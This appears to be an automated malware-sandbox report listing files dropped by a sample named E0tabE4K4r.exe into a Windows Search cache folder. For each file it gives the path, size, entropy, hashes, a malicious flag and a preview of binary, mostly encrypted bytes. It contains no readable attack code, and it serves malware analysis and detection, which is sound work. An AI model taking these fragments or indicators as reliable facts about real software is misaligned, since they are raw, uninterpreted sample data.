                                                                                                                                                  Preview:.b_se......P..1.......z.....c....9y7.e'3H..y..+l`-...B.E4Y..@#B)D.lj....\n6..7+.....}m=..........h./qF=...g.^...Z..|.W....HAL......X...H.).`U..........t....^.uT.....|.4h.AM.........aTt.%.8..Z`.*.6.P.^3..(.@{..M.AP..."8.,4...{..oM.J.uX}LX<.y..`.w.......B..aw.R.S.d..`..l..|O8k?`..w.lf.......:.....wf)a..,...c....<..."B..)J*BGK_.O`..N.[..V.Pw~p.U......5........S."h.d.E.q&...G]e.QR...7.....g......gHR<.......z.$&.X.J.ZsO2.\.Q%M.LD.q~y.,<..{.).......F.?.......|......x..E...G. ......L.......R.T........J.A...)..k/Tuv.....J+.*..q",.D......S..S..f..nM.^.l..|.p..c9.K....;v..L.aA.h.d..}./..fq..E!0\pU....U.....>.%$2JD..A.9.~..7H.M...A....a ...?.}6.3Uq.r!.0?.....).{..KOV5K.a....a.K....oBf...Q..).q\.f.i..w.uS.\dCs...Q.g.v...:H.@......?4...SDn...og......~1.9@L.i,{...q8y.}Rb^......N.......J.D..2..p,..KV.;.#.top....PC$..........p.m...l.^%...0M.'\a.`Q./P....H0hn..-.2...;'.}.bLG.y.<......P=..`..L.#.}..".;\/..{/...l..Fn..w6B"8......%v.....cy....<F\L$...E..J3..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\onra7PQl9o5bYT2lASI1BE4DDEs[1].css

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):67448
                                                                                                                                                  Entropy (8bit):7.997128898263373
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:DzNe4rVy8+y7UPb7hQ1qcOjbXKmA2tCC3eUc6nRwY4H73:vjrrpUTttn33PeU/aP7
                                                                                                                                                  MD5:8058D843CF82D109F45991D7061151DD
                                                                                                                                                  SHA1:2C1CD289B77F6DA955501332DE459C626745A3D9
                                                                                                                                                  SHA-256:B8EF11B5CE167D5C47E5D14A732DA7520877F484E1F08A3359D9C35CA7665527
                                                                                                                                                  SHA-512:859C6E4CB3E48C32B95A4E414DF682CB24C3DC116C3A9A9FA9AC54FF31D65A7B9F2C3DAFF48B776A6C83B7D5DDCB5DF3812E4E51440F8D1C0A714F1DAE554B63
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:@fontDGf.:.R3._.`.G.,.>......7.e..<.Jj!QI.....^...4W.Y.*..=.......s..n{..d...%U.G......q.....i3,....!....6.l..0.K...^....h..Pg=....Z....a.G.w..?=..!.$.nH...5...b..Z@..Un..c.:Q,~Cf.C&.8..#.A{%....$x...m..U.Z.@{L...$Cd.>.?./9..H.\_..$..}.......g+R.0....+a...&....b..#2.6...E.x.g.IN..A@l}X"........./.......x..n.A.U...Q...+...&..j.~.+..........#.O.>F..-.5A........l...8./#.\+.:.... .,|.>eA.G...h...QvP0.0Z<.d/..P.L.$!P[...g[.1.;/d....B......,TY..0...<G;61.oko...M...._..mg..!.I*..v.v..v...63C..~[.P-...V.w{p..e.....j.../....$...0...w"...f..P...".KG-..0{.<=..F.y.6B@.l...?en.+..6p......a.g.'.pe.t%e....W=c9..=#y...#....0.t.*s-.(-....4..D..J.$...%.{...J7.'...g.|;.ILu....E.vn..Z'....p.t....G.....bUO...V.a...1..mf.]..4.X.R...]J) ...L.@....].}...M0..m.2.7.*og(\1....,O.D....c.B}...N.y%&#[...^..IZJ..Ls...`.w..k.O.y..[In.r.R...|...kM.g.F....R8...ky.s..._.\......WDtm\n.E...>.e .?..7,umXB..p4.6{N.6.h.Ow....%..o+..8..O........F.?..MS.n.....(.}.I....[M

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\pqKAmz-4RXsuUf_YO-8_wQDepUQ.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40292
                                                                                                                                                  Entropy (8bit):7.9951018690277085
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:rE6O7cqtj8BuoopG1AXgoNeULC2sKvBehjkS0FU1QdhS0ECX1yH3fS:rIafowzPdK854U1VTHvS
                                                                                                                                                  MD5:E2AE66BFA647B620A7E1AE9D1A4F9AE6
                                                                                                                                                  SHA1:D7700CE61BD762E0B497BCFA501A4255DFF0CAD9
                                                                                                                                                  SHA-256:E5B6632E14A04ED8EF558FDF703C9E8637A86B362A1C623CE28AC9AFC7D078EE
                                                                                                                                                  SHA-512:260C923601B3247A66F347A5B87BA60DEEB02D7102A73633936D3B948A23CEBCD2DED88FB14B1B9D8746326F60EDD48C3E28CA3AC24D76328CCC6130BE26335F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:var W....F"...O.v...1..].Z..q...H........,G.4L.....E*....f........H.LuX.me.%....n.._n.rb6:.O/]~$.m[...b.>.bf...q.\.....c..d-0.p.Q<s.G.Jj.?..~.K@...K....zH..q..1.N. .$...8.2.A.H9...~..).:...X.-..5...Kv...=..J.......m>..m...._.'.>E.......^.cskp...Q..'.....5(.....B.r>~jz...K......X:.....'...>X.Y....Ok..:..R....{7..m......v....".C.d....D..Tx.J*.FZ-.....j.F..J."`\...w..x..6l......W.........%..d.g..5.......'.#.-.fF...W.9.#....?+.C..........G..lE..y...ilE[....O...7t.%..|.....a1..e..a.!..._Q.F.....*..}..}y.l.G..j..<.Nu^XjMW.+.g./...b..^'r.....p...j+&=+...|.K+....Z6.hp.f^...j...FZ.......)...B.....s2...|.d......<.1|...rE.C...n.N.....vm...........T..~i....:.~...6`.r.....o...ws.e..I.B... ....~bs<.c...Kn...d."...U.DI.V.:..N......Jthx.]..k.\N}....\@[.$8....3..#..'..B6..:.s.M~.L.@./r{..$9n.6F&....b.....G!rD..F..s.....#.....d"J*.Hc..{.Xli[c.KF......Gj.U.w.k..w<..?.]..H..`..:....{......-P.aFF..g..@.b...%.?POo......P..ng..D.RK=...1.P.a.....y,.e....1...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\q11NvYzJks_3Zy5BRKPM9baeQ7M.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2193
                                                                                                                                                  Entropy (8bit):7.899373442670595
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:xCukkxj4cBJu4VCkdelDSp8pZqRax7t6RrTF+ApD:DRj4cBJZCcelDSqrqRaOR/Eu
                                                                                                                                                  MD5:681C4F57E12C2D1ABA3CB1D88DBFAD95
                                                                                                                                                  SHA1:3D919C563207BD4AF762E4F6D63B3B90C26B0362
                                                                                                                                                  SHA-256:900763239DA624E513F446B1AB1C35021D6F0FD2E2D2B81D2D8199C234C98865
                                                                                                                                                  SHA-512:514D5E57A4E756CA43E773B65AE91B023B9959ABFD639455437E0CA846A14A61902423D4222B16DD3EAE81BC13EFDF0C4BCD9EE0E0D698BF11B7D043E8AAD461
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W.d.~t.....$Hr.i.b.....|DC..r....kT.A..E.-.P....!...bE....x........3.u.[.....-r@..=.f..=....6xTWR[f..^H|.`t!-d......[.^.._C).F.u......-:w.}...mU..}.A...v. Op.'~q..s$.u.v.:..p..?.0#...G.B....z.A....&P.D/r..........@.v.M%.y./6=|..\....U......2..A>^..EO5.zR...Q...:.2.m..m..",..2..eX......;.n.8.f.#S..z4...w..Q.....e.......K...Y...35.h=)......4.@.[`W'.mO... .F...{.F%z......g..J....;}..%.H........".....A*..M.?....G...h..h.by...}.....c...t..<..3.d...'......I.iu,.F..x.w.y(o.d$...SX..v............P..{...[..20^.C3..oa.F....b.W......n....%L3.......}....R..<...(.x.j..!y..'..+p..C.\..(E...aE-.K...Nf`......n.....5....>..~G.w.Y.1qk..2. ry...+.*l...9.0.?_]J..X-.R.p..v..........W..X......n'.RW.,..^.0....R.Cw.6. .'nT...2G.G.0}$.}m...^..<w.....zoD....~.F..D.....*.v..........B?...!K......=%V.._3L..dQ....VE..OP.j6..|....... l....%.Z.?=-...s..J.)'.8....W..>.w.E.....5o.+.F?..........o.].o*..,=S|.i]......f..{.......G.).M.nD.....A}P..:...Y....KD..u..M.[0.M4.D..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\rUQ8SSsIzKcgb77SIOCfnAbpfB4.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):447
                                                                                                                                                  Entropy (8bit):7.459246486513812
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:S+HLHG0/gZNXbvmO3Tzh5GcCwLFSUdNcii9a:ZTGUoNXb53TycCz2bD
                                                                                                                                                  MD5:C55EA3EA70608A18589DCC43B097F6DD
                                                                                                                                                  SHA1:870B3190D3D8B08409A49296A47AF80C476994A4
                                                                                                                                                  SHA-256:456B10385E82948A0F7E7C5526D9F5BFBB1A4022FEE6004079D42F074F98D27F
                                                                                                                                                  SHA-512:DCC430AD6D540AF42A5F2234C39D5132D7D8E81067C6636062315C437396433EA166A165E9D1526202828AC09008FE895FC53E42D9639D403545FE8E72651219
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var S.M.....n. bG.sn8.9..;W.d...o...5..8...._..=-..........0,1.C..C6?[...}.-G(..<R.t...])........f....a?.pd2.V....d....S@.....[m.R..2.v.7..t..g..#...q...z..M..)f.....e.....N.....w..f.~h=t..z.&..`i.$yz....V.*4|._....y. B%.&.C=.......;<xH,....?.....9\.....8...G...`..z.y.'C.Q.v.U.....+...x..............B...T.....T..e%t...*....#..!.+.kZ ......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):126434
                                                                                                                                                  Entropy (8bit):7.998421283751664
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:avJR7Si5Noiv3yLSubyUfrnj3D88TPv/P4Iedyz+:aBJSAyLTbpf48THI5yz+
                                                                                                                                                  MD5:F29977BFE8A4D409A193943793D5C8BB
                                                                                                                                                  SHA1:D76632EFC89C41F38960C5F780CBA0E56E5132E4
                                                                                                                                                  SHA-256:F08D3269E06FF40887B8105F63B10587A8A011557C4184810109D4704C99D888
                                                                                                                                                  SHA-512:0AE1347CE252975E996AB4FB9DE13C379D36687EC0121FFC05A8936442D0E865600B75448220D0E9D25322999D83C5B406BD910F4C761611077A4B521CCB376F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:(func+...4 ..+....&..*.gp.bG./...7.......W.......t.WL~IMc_...w(;L..._Vc...7w...8....o7{...%z.H..)s...(...A....rDh.k....h...w.......W...:*..2...L.A.....?!./.%.9N{R...Ei[.e.QN.N..Xi...."..5..O..+.....2...c.P>...[..::P...:\;.{..7.n...l..p$...c..]w8P..*....!?j...=..L.(.Q........;I...k.$.8K.....:.=.b.."..P..Xo.^.....FL..$......7....<Z..F......th...%....YF...K...q.3....X.q..G?.......9N.pLK....$..a..f....X...=".e...n.P..R<.I.@(..7R.0[l..Nq.H......u]B.k.B!1RJ~F...&.?..b.#^s.\.UA.|.x.s...=.k...xi.R..G....e$.=...}9ZoE..i,.cY..>-......B...\,..4....MF.b.....r.C...Hu.....k.a....n...|$..MOvC.V..jB(...W.....dcMx./.Zn..Y0...C..b.5<.n......p...5..K,#?.N.j......NdQ..M.5..y..anU...7.;mM..1.C..O}M.U.....E.........)....Ol?....`4..gq\.bP.T.;u...I..........`..8..L:.E.R.,x..../+nV.<@..M.8....Zv...k...T....MK..N.b]. ....Wi..P.. ....`.V..p.5#..K.y...@..B~b.....=6.p.....T..~Q...F.v.B.......Mj.Y...l......<)uK.._d).mT.z..%....Z-z......!.....A.p..4`.M......S..B...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\u6a26xOewOMoU1ZXcaLiQPZApTU.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1949
                                                                                                                                                  Entropy (8bit):7.923366613800732
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:lwxf0cewRxG4zAk8Pmkv1h70vjnxlu34h8wGD:O0dwHGvPRvbQdlP0
                                                                                                                                                  MD5:62A309B96F78317AD8FA3229D504580A
                                                                                                                                                  SHA1:83FAE3FA9D6C27F462776993ED113FF43F96C9F2
                                                                                                                                                  SHA-256:3739CD3EE2602F5C19A5EEF396D7566FB61CCDC1D0F73688BB1BBF2899EE89E1
                                                                                                                                                  SHA-512:EF3ED958BB57E457CA3DCBD1CD177C6DEA026F8FEB157DDE9BFA54E117BD0CC1241489DD78F15116F1C06ACA96DC78C495179B68CA828A8FC5CFCC7B72B8A5E9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W|..i.X.p^...%............Sg..U%.Yc..M.<....:.....t8.*N...D.....3GS......\.._..$..Z'.w..d.yO..^$.:.f...eE.p.h.:D.PNwc*.(...]exz..[.q..b..,.../Y... .Y..F...P.9.J........k(._R|.5.y....3...O!.#.6N.J;...D).i1..j...m.%'.._..i.m...rk.q2......)f......y?..A..../yv.....I\.L.x.._..:.-...&..R...U.'rp..Q.b....p).L...7..z.K.t..e....O.|...C...!.w....*-...g..rI.%I..~...-qyRMx.....)N,g.......S...d...'.&......D....Sj..#...tb..0/Fi......b....nu...E.<.G....e.\.X.p[.%.......S.1....!X."..4)N{.........X..p...?j..c8.T..?...Y.^...V.~?..X........3+N!..^.K...T..U.]...1..!u...!\.....7.q/t~$..I..9....y.p..LZ.zp..*.b.t3..@,wp...H.si .....o.....F...|....-}..h..9.<6....7.W.|....t].....\..Hf.B/...V...afO{w.$k.Ga>..J.Z...'....a...bu....v&.9.6..._.... ...0.W.r..ra...aM9..a....$U...5.\".?.uQ5e....".&.......-....8c|......`$...l6.......^s.-.d.S....w[...`....J..9..bK.....|...j0..w...}c{.m7HZ..?..*...?.m(.'....p{....'s..@S...Z..;...Rk..#".s.%...M.w.aC2.G..H+.Dp

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\uANxnX_BheDjd2-cdR8N9DEWlds[1].css

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20755
                                                                                                                                                  Entropy (8bit):7.989447002971956
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:wv6F8bY124bDcc3NzYpOJLNdL4kaGDmfdPQp7xyoLp/ClDLAkYvN:Q6F8k1xbx3NzYpOfdLpT2dPQREokPAk2
                                                                                                                                                  MD5:EDD7611C3CE93BAC49544126870BBE9E
                                                                                                                                                  SHA1:8169928A2A583D4C88E60C8FB477D123FB0790C8
                                                                                                                                                  SHA-256:738AF3511F6172815FE48516C76EB65C8AA645B8A3A1AFEF8C0517179A79A8E5
                                                                                                                                                  SHA-512:7CB52686F930BAD53E5226FEAC3503714118B5B31E5FCE39B83BC7F191B12D099F1F39B6D2AD505B2E6690269B497177875C6AFBADCAC0776FB9405C91493EB3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.sw_p.(.c...S0W.......l.Js.9.wv......../.!.YI1......1l.P.W...Q..|.u....^(.P...........6.&..m...E.....Q..1..Y=.A..Tz.[..y.%3..i...|L.."..k\....S..........W..G.|.0L(lvc..r9j..+..O..G.=.JU.."K"..1.. &. v@....y..&.m...E+J.W.{.>.;6..r..*J..C...lW..L..rC8.H....A."...:$..P..{..G..4v.....v...j.!.<.)...........R.6....="...+...#..cdR..K...pW....sy.4...;yj...U.0j..o}h.s;..s...)....7...;+......8..t........@5....#MY..-l..De..6....EY...0.Q.'<....v..i.N....;..q....Z.&...7,;$d7?._..b....R.....mh.....J|PF^i...D80...l.}....3].....N.'...%.....4......|..,3.Fr*_..[%vW)._......jg.:.y......k..6.x..3A.$4c....E.7.Y.0..~...R.D..>AKJ.c-.?K|!....,D.R.\.Qe...=..U...1....8.........X..nO.....`w......1.c..cv...Y...>.+.]^...c......&.....Dm...Ei.. aU...........6.#.6W.E.Q....#...t..ZX=...m..#_)...._u.I......Igq.I.5.......hO`..V......q+If.a..h....1\.$dWF..J.HN..N>....p'......c.8u.-.d..X...... *&.$W.b..\.rw.-.3y.......~...<....jH.2........Bn..".00.R........L..i.O..HJp

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):254754
                                                                                                                                                  Entropy (8bit):7.495626835572354
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:p4LUIvcVX/Y1RjflTg8zD5vrW++xnSbbr6GavsINKN9LfdfwA0k3LZBDYguV5:SvOwj7lTFDXgCr6N2N9zdf+
                                                                                                                                                  MD5:84FFEF2E3FA81EFFAC658502F84807A5
                                                                                                                                                  SHA1:201C049EA0504ECE7A5CD265E71CEF429274B3B5
                                                                                                                                                  SHA-256:2A625B2718ADF9557E0AB72BED819E40331DE14AC9775E9A69183398462B72D4
                                                                                                                                                  SHA-512:9CB4642DA413155DFB05EB33C3C7AA817B2A4B9F7640051BF7B40D39BA7485AFF128A633F97F99F677D77BBF233F903A0D86CA775B2C90305F18B089270C55BC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var WK..........oLd.[ep.r.#.'.......FP=.,.qO...I.W...-a.z..9k.d....."g..b8#p5v..3..*..r......;.f:Pd...h..c.z....l{j0.9..x^6.[.....].)Di.ol.%.L..v..=. ..N.S`...%..M2..\..1X(.]m.O..H..k'?..........tt.[i...;$C.?..V....T.Eo.....T.x.....?._..=.'[6......z.I..X}x.:..W. .-R..&.I.KZ...... .7.......AF...9..?..'.B.`J<..v/........H..b-.R?..4R4.v.:...]....x4d....@..Uk.......1.)h..l......C.).?.-..P..596.w........U...Q.@}5......g`$.8pEP.Z.Gn]-...*t%|.g.!R.......b]...b.]+_...)<...=...As..x89......=.......Q....g..............+..t.]....(........9b.n.v.)Z..=..Em..[KeW:....S.%...t.J:......y..O......f.+[..Tb....aB.e.T.jd..o.b.s+O..%..\.R<_Z-.....7....u..A,....Gz.Nt..s.V.6:..b.p..gI ......X..<.HH.......rp..E....P..5..{(.F...t.}.!/j...A.Y....A.uGk6_..y#.....Ktk...P.....xP..j.!...w?..$...p....in..E...T...?R.hi...T...X...6...m.8....v1;..H.l.9.a#44.,.o...:.a.n..d...!....L'.|.....X'.Q.,.......5:...3.'..2.2.T3.u...4S..*........DZ.O...~P..En.QM.~k.}lo.f.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):58122
                                                                                                                                                  Entropy (8bit):7.996827219126542
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:WVaODZQYlqS+7hxhysZDnyL6kSexOGPGY4wOlLg:LO+zhys5y+UxOGugOlLg
                                                                                                                                                  MD5:970220EA1D5780CBE2E0C0D263685A26
                                                                                                                                                  SHA1:8742FE793CCC100758A7DC37C8FC0A640E4DEB7C
                                                                                                                                                  SHA-256:9158DF9B8397392A8C317A93DAB593BCFA05C5C5F4D11DABF1AB2B37D0AC49F0
                                                                                                                                                  SHA-512:3C6DF45B6AF852ED23688F7C7663FF3E43E847F797608E501D57F2F64A3DDC9FBD4F483BF7328F16F8C2C749E11C5DC2FBC253A426D3248C94CBFBA03FDB34E9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:var _C....J.....MaJ2.kC.........l.".9...D..$..j..XA.}.B_1...Hfe.+Q.[.n....B!..........t.l...Qa..PPE.~...}Uz3P.......i.....*.>mrL,...y.._.[8....x.!...$"7.....R.TQ.1...{X..m...Ey...z.=M.j...J..qd.c....L.<+[2....$y~....fO..D.....0...|%\..O...e.,......A.YR,N$....<:B.c.M7.v.##...2K%.).L..u..pl......fe..JV#|G....,..:..&L........;..Y.2..P.=....Z../......{x....y.....G.:.,...98.kl..9...O,.....y...}p.!..{...T#...d.3..M.q_f.(.(6....Ty.y.SO...SP.....MT..:..s\lb......xbvM......^.F...7...Q..'$8.U9....OG...q..{=>....#...4....Q&..ea^.S^.Rph?....p|.X......}lV,..B..$...n....}Q#8w..N.]M.-Q..s*5,........0.c./.u/..&5.so+....I&W~..6....;.@...e.W.[`..6.K..H.N.@.&ls.gcAX.....{..s8...Js....$.x..<).a..6.......9.r.._..........|.....4r...;.,\.....ydf)..p...|6.....b..l.=......#........wL..M....-e.P....v....b.9<.li...B/.....(B.v.G`..,Ld..%o...E#.!..=.u.&.....-....2.-.5..%..N..,..#..%2 .r..:&.....y._.^.2....4.........>_rH/."......S.....LHA..h...i.L~.b......D......8_..+zI.w....?.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):95724
                                                                                                                                                  Entropy (8bit):7.9980237603179285
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:+DC0DzmD2TvdbG/+dwB8kxznY+qGQloGyC1LuGxpjQhhE1BOhpbagR8NDAyR:N81SwwikjY+4loGh1L1xqhaohpbHRmEk
                                                                                                                                                  MD5:01B413F4E6AB9DAFC1A95ECE71DEA058
                                                                                                                                                  SHA1:070F06BC09F03B2430E5E911D7E1772A7CCDB270
                                                                                                                                                  SHA-256:319C9045FAE0DAC92052D544D202B1843377CB5799B2DAD4CB245BF8FDF405FA
                                                                                                                                                  SHA-512:33638ED0562AC568FC45FCCCFD6AB8CF97DADF867D33122A187E6D79C9EC477B71E8573742861585FF4320BCB15C5584EF95A5DE962A8D007D3BCB600A3E094A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:var Wa"......B.w......J.....U.4.X...~.:..M....K {...z..{.Y.MB.jz%...;....<.B."CA..%.+.*./......S..|`E..C...).}..R..='E.....a.<C,e.:..~.b........b...lf..am.S.M.?.0.R.......v...rx.j...};<.Fv.s.[.4."N7..*.m.6.wz_q.$:.68.`._;13.S.t.....E..wvG2...."maY..Y.T*...H>.m...f.>.V.%[,.....}....P.}.R.U.....&.'....<.2.....y.lP;.....#.....sm~....0.6$^R.}w@.Z.......Xw.r0.U....'..`<).,..L.\1..&R....1y...|....^.X..]...?[.#.......&..<.......~...&+..W...............#...?.lw..y....../....D.3...,.OG.$...v.BiQ/.Q..Y.('...Z?..2..rp.S=..hp..\..e.n;th.,.e(........*,`;.....&...=.m..C.S69...A<|{>.y.|U.....M.$..N^...*..{.....5..a)...D..L..40x......?.u.Mrh.Y...........kg...T..6S...).._..D....uj..VQ..M.....A.@S|........L.....6..1.6.0.b...2..gF..`.D....@t.W..Y.CE..)#.83.:.u.k......5F.._8EwKa..@.~9...m..V.'!.O..B....&.c.....hS.x...A..[......8./SOW(i.Q.D.1.T.$..n.u.7.y.^.M.@.<K.0.....(..\....P.......U-.lVn.O..N.Z.....c...!.......9...E....~ks,..!P.h=X6.q.).:.#..b....).yM..O

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\9ST538Q5\trans[1].gif

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:GIF image data 21370 x 32670
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):377
                                                                                                                                                  Entropy (8bit):7.338378399300687
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:HIhwCzvQ3FYJ2L4B/X/s+WpyfZkA0vPgCTdrgds084V4/NJi6/ytjwHhoUnIS1Wn:HIRQVY8L4Z693gCZrmn7V4FJR/Mj+huB
                                                                                                                                                  MD5:E30103BFBF0830EB2C83CEC344A151C7
                                                                                                                                                  SHA1:E36738AA15A0056FDCF17B3EC9EE8F8777B476DD
                                                                                                                                                  SHA-256:E87F0F0B4E0AA36A9597EED03F55A06CBCB927C6B138F2AD30E89981A0B3F6E3
                                                                                                                                                  SHA-512:71F285316E44F58AD6D8F9CF608B78CB72F08CB85CAEF8497B4CE6ACE197D47F24E8ADEC30D5561DECA0A2A24394661EEA4198589BC8702F600F5DBBB0799AD3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:GIF89.zS...D..<2.N3jE/.{<t.?p...l.0qO^.0..V....G.....o.....A.D.<..[,~....,0Gd...I.U.. ...8.I"5.q...t.#B.....d=)...fS..+.J.2z.,A.1...[.M....e.EwhA5...!...uL1.^....Is...W...Na9...=:.#..+.?...IEy...~......Em.:r..d.P...c.n.\..@.:.s(..9.z....ks.A..w........)..<. V......=Q.&.G.z.K.kF<I.NmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\MSIMGSIZ.DAT

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49454
                                                                                                                                                  Entropy (8bit):7.996573326953915
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:SG0F6UTEwQ8g2xQyafyA2Q6WWj9+faMc9H5Zn7jONRSTFcxGZPj2P21Ac/ogKr:F0MUTJqNv3wDnmNRSTSxj2+iogY
                                                                                                                                                  MD5:4AFFABEC61499480D2995C0766E0FCEE
                                                                                                                                                  SHA1:53FD4748F2F95A898E4E9E08517752BBC2884380
                                                                                                                                                  SHA-256:D8591CE027D774DE2FEBFE0D1E8EA25CB65674E87BBC0442CFBD0CA04D8D846D
                                                                                                                                                  SHA-512:35D3C087AC19AB7AC514BFF1B76E68D30BC1F6B47FCA4C987692534B1CB1FB030B1C8FCF31251B3220C50D1D5CC11688630989B02AA31B7F849C9FA7FBE1149E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:.......in._....Fs.=....e...-....&..>ZR.h.B..I...Z.NF.S."E..+..'dmMh..T.i..K.?........\iME...B....?Z..M......J.3x..=...).V.T!.qR.S.........9..dp.....#.....X.......O.y.........um....2M.~..B.-.` <.8M.C.q..X..b..'..?l.L..S....wgv.C$.AbF9.0F.fM....n..,.."...)7....?.{.@.|....I3W.8.:........_..g.t...N..y.(ki......HJ....3[.....$!.1'...V%.U..].M.m9....K.&.2,e....dM...B..P".X..C..p.xV9..Z~E..V.,....f....%1.N...l.F...@0Y.....*.#b...6|.i.....H..f.l,w.......(..........!R........O..\V....O....D....U+.ra.iG....Y....t.Ue.B........'..........(.}%.B.D.G.`D..A.Dx.X\...n..o..X...F.%._7.Y_.79N.].i..Z[wa|4RWP..4.T....Y7.0..m7....W......n[.I^.]..(..B.-.{.(.:.n4..Yv..c.d.U.{..7.x6o...i....G...dwvoG^.2aX.u.....wA.,.S9.u..]s.[>.p7.f~I..y.d.....|.......9.N..J....Y..|.?..x.s........6..T.ux._.%{F.UQ.......y...u....{....Y......OC..T..^..../.....w...?.t..^..cD....[D yi..L.m@.^....+_.{........._...&....a........k0.*G.......2.X. .`K`.....:hQ.t.J52.Y..........;.F.8u.I'.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\PJOIJVPQ\X4wIjRXDbKeGz0mzi-NAovdjKMM.br[1].js

                                                                                                                                                  Download File
